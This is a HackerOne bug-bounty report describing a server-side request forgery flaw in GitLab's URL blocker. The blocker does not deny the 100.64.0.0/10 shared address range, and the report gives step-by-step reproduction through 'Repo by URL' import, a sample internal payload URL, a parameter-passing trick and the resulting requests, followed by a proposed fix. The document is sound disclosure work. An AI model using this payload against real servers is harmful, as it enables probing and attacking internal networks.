SSRF possible due to shared address space not being blocked.

HackerOne report #579934 by no1zy on 2019-05-14, assigned to estrike:

Summary

Because /lib/gitlab/url_blocker.rb does not block shared address space, SSRF is possible.

Steps to reproduce

1. Go to http://{host}/projects/new".
2. Click to "Repo by URL".
3. Enter the following in Git repository URL field. http://100.64.0.5:9999/ssrf
4. Enter other required fields.
5. Click to "Create project".

GET /ssrf/info/refs?service=git-upload-pack HTTP/1.1  
Host: 100.64.0.5:9999  
User-Agent: git/2.18.1  
Accept: */*  
Accept-Encoding: deflate, gzip  
Pragma: no-cache

6. If you want to send parameters, specify the URL as follows:

http://100.64.0.5:9999/ssrf?param=true#  

GET /ssrf?param=true HTTP/1.1  
Host: 100.64.0.5:9999  
User-Agent: git/2.18.1  
Accept: */*  
Accept-Encoding: deflate, gzip  
Pragma: no-cache

Impact

The shared address space is used as a private network address by the ISP.
Reference: https://en.wikipedia.org/wiki/IPv4_shared_address_space

This issue affects all actions using /lib/gitlab/url_blocker.rb.

Proposal

To fix this issue, also block the 100.64.0.0/10 netmask.